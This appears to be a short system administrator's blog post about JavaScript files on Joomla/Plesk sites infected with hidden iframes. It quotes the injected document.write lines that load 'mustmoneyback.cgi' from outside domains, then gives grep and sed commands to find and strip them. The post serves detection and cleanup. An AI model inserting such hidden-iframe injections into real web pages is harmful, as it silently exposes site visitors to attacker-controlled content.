Blog

New joomla infections (?) mustmoneyback.cgi

Today looking at some systems I notice a new pattern on some .js files. Multiple files were infected with the following code:

;document.write(‘<iframe src=”hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);

;document.write(‘<iframe src=”hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3″ align=”center” height=”5″ width=”5″></iframe>’);

and other domains were found also with the same .cgi file calls. An easy way to look for infections on PLESK systems is the following:

find /var/www/vhosts/ -type f -name ‘*.js’ -print0 | xargs -0 egrep -iw “(km0ae9gr6m|mustmoneyback)”

After locating the infections one can clean up the files using sed and the command:

grep -irl mustmoneyback /var/www/vhosts/domain/* | xargs sed -ni ’1h;1!H;${x;s/\;document.*iframe.*//;p}’

or,

grep -ilr ‘mustmoneyback’ . | while read val; do echo $val; echo $val >> /tmp/jsinfected; sed -ni ’1h;1!H;${x;s/\;document.*iframe.*//;p}’ $val; done;

keeping a record of what files were infected under /tmp/jsinfected.txt

Facebook Twitter Linkedin Digg Stumbleupon Email
0

Υποβολή Σχολίου